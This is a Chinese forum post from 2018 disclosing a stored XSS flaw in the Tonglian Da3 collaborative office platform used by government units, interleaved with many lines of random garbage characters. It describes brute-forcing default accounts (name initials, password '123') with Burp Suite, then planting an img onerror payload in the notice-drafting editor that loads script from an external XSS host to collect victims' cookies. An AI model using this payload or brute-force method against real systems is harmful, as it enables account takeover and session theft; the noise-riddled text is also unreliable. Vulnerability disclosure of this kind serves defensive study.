f5 l: m8 u1 e, m
n1 o% @- o; {
同联Da3协同办公平台后台通用储存型xss漏洞
. J& w8 e4 n- ^
; T6 d# [" X6 @% Z# }; g " V' K6 i! r: l
平台简介:
7 c0 S5 j2 V- t8 |- V B
1 T: p$ l0 }. j/ q) {8 [- Z* \ $ q5 u" I' V2 S+ c% p( M
3 K+ \7 S7 f2 y4 x- _
% i5 h3 r1 q9 t# x
) N5 y4 s" B! l' @$ g; p$ C P* k
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
9 L3 t6 o+ `7 T# w同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
( X- T1 _4 I% T# G同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
4 v4 K( f% c! I
+ D, M# ~5 {% b9 _1 X4 z7 S- |
9 \ O6 s% P, B3 Z8 Z. ?5 E
0 f8 j; H# m8 r* g" v
L7 V/ K, `! C r, {& h. R4 `9 y- v( W
8 G) ^: U+ t8 i: {9 f3 n 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:! a0 O! a/ K# g: w
$ u, x6 @% ?1 g* Q; O' K
# W2 ]0 i' N: T: u) P
( X; Y6 R$ k. I
2 r; n% U+ E/ J
# Y" ~8 C+ h$ s http://1.1.1.1:7197/cap-aco/#(案例2-)
) i k( H% U3 l" T
' l2 K+ |" A) F* T9 ^
: f, ?. U* Z4 L! U9 B8 o" P# D http://www.XXOO.com (案例1-官网网站)
! v+ {5 G5 x" M0 \8 c
: J! j) q/ _( X3 A" L5 W6 Y( ^& E
: |* z( l5 Z" @4 o: } 漏洞详情:$ O8 ]& K" O4 ^+ y
6 b9 |. n( Z+ p% _3 Y0 R. C/ j0 j2 z
' M- q# w0 t# T+ w 案例一、, Q8 C4 \3 c8 i( W- I. q4 _
0 O+ y6 q' g, @4 H+ J0 e
" b+ ^& ?5 M. a% d' \ 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
" b. a1 M; } o2 Q
6 E# B( B ]- Z& y3 ]
! `$ M7 s3 a1 R5 z. `+ W* x k 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
) p0 q2 }! \5 s a9 Y, d
. @4 o1 {% C9 T
?! a0 f; _$ c5 C! V7 c" q4 t/ s- Y
' Y: G0 v- Q* Z* b
/ H' y A, F! q4 s; y- b! D$ F, Q
# ^: d* r r# P: t4 @4 {9 k* C
. t5 U2 m' ^2 I7 j7 h/ | r# a8 T
7 Z- u6 D; ?+ s
4 b. c* t; f- W4 _% P0 O status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
: u; U6 k* {/ t+ T' f' `$ a
% u9 ^' L, B# t4 X* r% G
, K4 W6 @/ c3 `9 {. S! K, H# i ) s0 i$ r c" F7 o: q( E
, [* u4 Z2 F- ?2 |* g
+ M0 s3 @) b/ w) |9 X 
6 Y4 R- Q6 A* M7 {4 `: q1 C' m
' E5 q. ^! y0 c& f, F7 z , ]- G! \) j Q( w/ c b ]2 `
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
* P4 O7 s6 o Y4 U
! m8 L D% t; p5 R# |. G. I) K
4 s& g- O/ K8 Y: e" b; O; Q! G # }* T& K( f+ Z
+ X4 r5 \+ R/ A& X3 [$ `) S" }
% U- X# S% _& ^ <img src=x
. N. j7 F( i" P; H: b& \' P5 Wonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 5 w2 n* ]% j2 I
: P1 u [3 C9 i' b& L# A5 E- u
' i: H2 m2 h3 F+ d) [1 T& l 
: u7 `" o; p' ^/ h
, X6 U# X9 b2 M
, H8 e+ ~$ Y! W `1 k5 d( F 然后发送,接收cookie如图:
1 O; P: Q% i: A2 A
3 |7 e. S R+ J; o+ o3 ~6 g% I# ` 7 k- _0 s6 o9 ? @* V+ e
! s3 E1 L, Q- f+ R: E' o9 ?
1 D9 k. a7 k" R9 v
. s) A; |2 H- S3 A5 r
+ p: a0 @2 S3 t v
; G+ W5 q/ X: o
/ U" Q% a' z, ]' F. H' i: |: d
8 P3 f9 V: V- v
" r. G+ L7 ?) V
0 P) P1 B, i/ t$ {& s' L. W
$ P! W, d) K/ _$ `+ [$ U0 I2 m
' K0 y3 ?' c# v$ o
& Z1 x+ L4 H8 I9 l
* j1 O0 F7 o9 k
9 m0 m& l$ A1 K
. X8 T7 z5 }* P' g" W
; P/ L; Z. [& W' J5 U
9 a! L! h) U0 _6 n 8 W; o! M) W; t9 g5 p
5 w1 m, a% I2 m) j
3 O2 X" f6 ?' _5 p- U* K. E 7 I4 l6 ~% b& ~" a1 h( {/ ^; n2 s& q
案例2、
7 T% I8 U4 D; M
6 R, u+ M' a2 {4 N: N4 t
) A$ G& T& [. P2 e# A: h; }; j
前面步骤都一样,下面看效果图:
5 S. o: y# ]4 E
* e0 G( U" q1 L
- _+ L0 K R# j. f3 I 
: m( X% [; j) y$ O( P$ ]
. {8 W" h+ u- { & C P- I/ ]4 ?
/ [: R- {0 `3 d \
$ r/ T# P' I, Q " j+ j$ j4 p% y; ~( k2 y. d3 l; w
i3 r4 ]9 _- M' x* |5 L; E) L
8 J ^& l% P9 r4 K% D
! F: T, H$ d8 {1 a $ I/ m4 s& Y4 i
! Y5 w5 T0 K9 ~# u4 Z
3 W) c5 X, S5 ^9 m. v5 N4 B 
. {: t0 D) S" p1 A- e1 k! f( e. \
* G6 c, B7 s, @; n ! C6 j/ ?/ B. Y2 n6 e
% L2 s# r& \7 i4 W0 ]( P
$ s- b5 o1 z d) {. W, O5 \ e3 N ; s5 B) q( H! q/ C4 v/ A7 O- v% P
& L. g, r1 _: k( m+ W" u; |! B
4 Y( |6 u" z8 Z4 n
) P. p1 Y4 v% [6 T2 ?
! H4 x- p& c t# w; Z0 V7 _
2 L, |; q8 R$ D' T9 Q2 h0 u
# h1 |! c. A o3 i" R 2 C2 Q3 ^& |6 v& x4 X
+ [: y. G& ~& j: T5 R 
发表于 2018-10-20 20:14:15
收藏
支持
反对